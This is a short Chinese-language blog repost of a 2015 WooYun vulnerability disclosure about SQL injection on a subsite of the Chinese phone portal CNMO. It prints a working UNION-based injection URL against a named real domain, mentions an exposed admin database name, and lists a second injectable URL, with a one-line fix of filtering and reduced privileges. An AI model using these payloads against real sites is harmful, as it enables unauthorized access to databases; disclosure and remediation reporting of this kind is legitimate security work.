记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

手机中国某分站注入(可union直接查库)

2015-02-09 01:40

http://topic.cnmo.com/active/blog_wall.php?topic_id=346&userid=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,CONCAT%280x71746a6371,0x476d52624d5043624768,0x7164766771%29,NULL#

可以union

38.jpg

漏洞证明:

38.jpg



[*] substation_admin_power数据库

应该就是 subadmin.cnmo.com



http://topic.cnmo.com/active/11/0907tongxunzhan/news.php?keyword=%27%D7%EE%D0%C2%C0%D6pad%27&num=8

得到.jpg

修复方案:

过滤及 降权!!!


知识来源: www.wooyun.org/bugs/wooyun-2015-088616

阅读:111137 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“手机中国某分站注入(可union直接查库)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

❤人人都能成为掌握黑客技术的英雄⛄️

ADS

标签云

本页关键词